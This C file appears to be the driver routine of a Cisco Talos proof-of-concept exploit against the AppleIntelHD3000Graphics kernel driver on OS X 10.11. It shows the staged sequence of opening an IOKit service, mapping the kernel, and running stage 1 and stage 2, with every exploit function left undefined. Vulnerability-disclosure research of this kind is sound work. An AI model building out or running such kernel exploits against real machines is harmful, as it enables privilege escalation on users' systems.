
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int Alloc (int ,int ) ;
 int IOServiceClose (int ) ;
 int IOServiceOpen (int ,int ,int ,int ) ;
 int InitService (char*) ;
 int MEM_SIZE ;
 int MapKernel () ;
 int ResolveApi () ;
 int Stage1 () ;
 int Stage2 () ;
 int mem ;
 int printf (char*) ;

int main(void)
{
    printf(" ---------------------------------------------------------------- \n");
    printf(" APPLE MAC MINI AppleIntelHD3000Graphics EXPLOIT OSX 10.11 \n");
    printf(" by Piotr Bania / CISCO TALOS \n");
    printf(" ---------------------------------------------------------------- \n\n\n");


    IOServiceClose(0);
    IOServiceOpen(0, 0, 0, 0);


    mem = Alloc(0, MEM_SIZE);


    printf("Mapping the kernel \n");

    if (MapKernel() == -1)
        return -1;

    printf("Initializing service \n");

    if (InitService("Gen6Accelerator") == -1)
        return -1;

    printf("Commencing stage 1 \n");

    if (Stage1() == -1)
        return -1;

    if (ResolveApi() == -1)
        return -1;

    printf("Commencing stage 2 \n");

    Stage2();


    return 1;
}
